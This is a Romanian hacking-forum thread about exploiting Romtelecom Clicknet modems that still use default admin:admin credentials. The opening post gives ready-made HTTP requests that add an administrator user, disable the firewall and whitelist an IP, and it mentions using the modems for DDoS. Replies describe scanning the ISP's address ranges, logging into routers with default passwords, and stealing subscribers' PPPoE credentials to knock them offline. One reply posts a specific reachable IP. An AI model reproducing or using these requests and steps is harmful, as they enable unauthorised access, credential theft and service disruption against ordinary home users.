Mata-i grasa _|_
RST  

Go Back   RST > >> 1337 Zone << > Exploituri si POCs

Exploituri si POCs Cele mai noi exploituri

Reply
Old 02-09-2010, 08:07 AM   #91 (permalink)
Registered user
Bautor de palinca
 
al3x4ndru's Avatar
 
Join Date: Dec 2009
Posts: 143
Rep Power: 1
al3x4ndru se balangane pe drum
al3x4ndru is offline

Default Clicknet dns exploit


hotel regim hotelier
hotel yahoo domain
prin intermediul acestor modemuri se poate da un ddos ,deoarece au deschis si portul 23 (telnet).
alte chestii
pentru a adauga un user :
Code:
http://admin:admin@ip_vulnerabil/Action?user_id=rst_center&priv=1&pass1=parola1&pass2=parola2&id=70
dezactivare firewall
Code:
http://admin:admin@ip_vulnerabil/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70
adaugare ip sa treaca de firewall
Code:
http://admin:admin@ip_vulnerabil/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gatew
[Doar userii inregistrati pot vedea linkurile. ]
__________________
sa te fereasca dumnezeu de omul care a citit o singura carte!
I live here
  Reply With Quote
Last edited by al3x4ndru; 02-09-2010 at 08:50 AM.
Sponsored Links
Re: Clicknet dns exploit
Old 02-12-2010, 08:40 AM   #92 (permalink)
Registered user
Bautor de whiskey
 
wildchild's Avatar
 
Join Date: Feb 2010
Location: root
Posts: 428
Rep Power: 0
wildchild is an unknown quantity at this point
wildchild is offline
Default

aceasi chestie este valabila si la routere.majoritatea care vin din fabrica au un default username si pass,il poti gasi si de pe net in manualul de instructiune.most of them buy them,plug em in and there you go,you've got internet,there's nothing left to worry about.din cate routere am accesat,cam 85% aveau parola default.
__________________
nothing's impossible
a wise fool is wiser than a foolish wise man
  Reply With Quote
Re: Clicknet dns exploit
Old 07-27-2010, 03:12 PM   #93 (permalink)
Registered user
Registered Users
 
Join Date: Mar 2010
Posts: 1
Rep Power: 0
dutzu93 se balangane pe drum
dutzu93 is offline
Default

109.96.146.122 e accesibil...
  Reply With Quote
Re: Clicknet dns exploit
Old 08-11-2010, 07:26 PM   #94 (permalink)
Registered user
Bautor de gin
 
Join Date: Oct 2009
Location: Cluj
Posts: 240
Rep Power: 1
alexalghisi se balangane pe drum
Send a message via Yahoo to alexalghisi
alexalghisi is offline
Default

tare ideea
  Reply With Quote
Re: Clicknet dns exploit
Old 08-11-2010, 07:44 PM   #95 (permalink)
Registered Users
Bautor de bere
 
Join Date: May 2007
Location: GPS Connection error
Posts: 34
Rep Power: 0
catalinkm se balangane pe drum
Send a message via Yahoo to catalinkm
catalinkm is offline
Default

Tare ideea da daca iti schimba unu pass admin:admin apoi iti deregleaza username si pass de la conectare din WAN Settings esti nevoit sa resetezi modemu ca-sa te poti conecta din nou la net.
__________________
بعض واحد لامتصاص أكثر صعوبة والقيام به ، وهراء و!
hacărilor!
  Reply With Quote
Re: Clicknet dns exploit
Old 08-12-2010, 01:05 PM   #96 (permalink)
Registered Users
Bautor de whiskey
 
Cipry's Avatar
 
Join Date: Mar 2008
Location: 127.0.0.1
Posts: 358
Rep Power: 3
Cipry se balangane pe drum
Cipry is offline
Default

dai scan cu angry ip scanner pe ipurle rtc iar la care sunt alive doar te conectezi cu mozilla , introduci user/pass (la majoritatea sunt datele default cum a zis si wildchild) si poti sa-i dai si restart la router , ii afli numele (la persoane fizice userul si parola de la net sunt compuse din nume+prenume sau doar o parte din prenume in caz ca nu se incadreaza in limita de caractere) si multe altele gen parametrii).

de obicei user dat de rtc= numeprenume_judet (abreviat) ex: B,CT etc
  Reply With Quote
Re: Clicknet dns exploit
Old 08-12-2010, 06:41 PM   #97 (permalink)
Registered user
Bautor de vodka
 
AlStar's Avatar
 
Join Date: Feb 2009
Location: Galati
Posts: 540
Rep Power: 2
AlStar se balangane pe drum
AlStar is offline
Default

Acu' daca tot s-a redeschis discutia despre chestia asta, as avea o curiozitate:
Quote:
O persoana A este online. O persoana B acceseaza router-ul lui A, ia datele de autentificare PPoE, reseteaza modemul, isi deschide o noua conexiune PPoE pe propriul sistem, folosind datele proaspat furate. A observa ca nu-i merge netu'. Intra repede pe interfata router-ului si introduce datele PPoE.
Va putea A sa se conecteze la Internet, cat timp contul pe care incearca sa-l acceseze prin intermediul router-ului este folosit de altcineva?

Hm..de fapt, tocmai m-am lamurit. Nu poti folosi in cont PPoE in timp ce este folosit de altcineva, indiferent de metoda de access (router/ conexiune ppoe).
Deci daca cineva iti fura datele PPoE, tre' sa astepti sa iasa ala de pe internet, ca sa revii pe internet cu datele tale.

Totusi, am o idee.. Se poate schimba parola PPoE? Cum?
__________________
Romanian Security Team
  Reply With Quote
Re: Clicknet dns exploit
Old 08-12-2010, 07:23 PM   #98 (permalink)
Registered user
Registered Users
 
Join Date: Apr 2010
Posts: 1
Rep Power: 0
thera34 se balangane pe drum
thera34 is offline
Default

Quote:
Originally Posted by AlStar View Post
Totusi, am o idee.. Se poate schimba parola PPoE? Cum?
Nu poti sa o schimbi tu, ea este data de catre ISP. Numai cei de la provider o pot modifica.
  Reply With Quote
Re: Clicknet dns exploit
Old 08-12-2010, 07:33 PM   #99 (permalink)
Registered Users
Bautor de bere
 
Join Date: May 2007
Location: GPS Connection error
Posts: 34
Rep Power: 0
catalinkm se balangane pe drum
Send a message via Yahoo to catalinkm
catalinkm is offline
Default

Aia de la provider numeprenume_Judet ( [Doar userii inregistrati pot vedea linkurile. ] ) nu merge sa o schimbi poti sa scrii ceva la misto ca daca ii dai restart se conecteaza netul din nou.
Dar intaii sa scrii la aia de la provider sa ii schimbi parola de la modem aia cu admin:admin ([Doar userii inregistrati pot vedea linkurile. ] ).
__________________
بعض واحد لامتصاص أكثر صعوبة والقيام به ، وهراء و!
hacărilor!
  Reply With Quote
Re: Clicknet dns exploit
Old 08-12-2010, 08:11 PM   #100 (permalink)
Registered user
Bautor de vodka
 
AlStar's Avatar
 
Join Date: Feb 2009
Location: Galati
Posts: 540
Rep Power: 2
AlStar se balangane pe drum
AlStar is offline
Default

Quote:
Originally Posted by thera34 View Post
Nu poti sa o schimbi tu, ea este data de catre ISP. Numai cei de la provider o pot modifica.
Hm..sa vad cum oi face.. Poate o schimb, ca nu se stie niciodata

Quote:
Originally Posted by catalinkm View Post
Aia de la provider numeprenume_Judet ( [Doar userii inregistrati pot vedea linkurile. ] ) nu merge sa o schimbi poti sa scrii ceva la misto ca daca ii dai restart se conecteaza netul din nou.
Dar intaii sa scrii la aia de la provider sa ii schimbi parola de la modem aia cu admin:admin ([Doar userii inregistrati pot vedea linkurile. ] ).
WTF? Ce zici ma tu acolo?
__________________
Romanian Security Team
  Reply With Quote
Reply

Tags
clicknet, dns, romtelecom

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On
Forum Jump




Copywr0ng (c) 2009 Miercuri catre Joi - RST
All logos and trademarks in this site are property of their respective

Hosted by powerhost.ro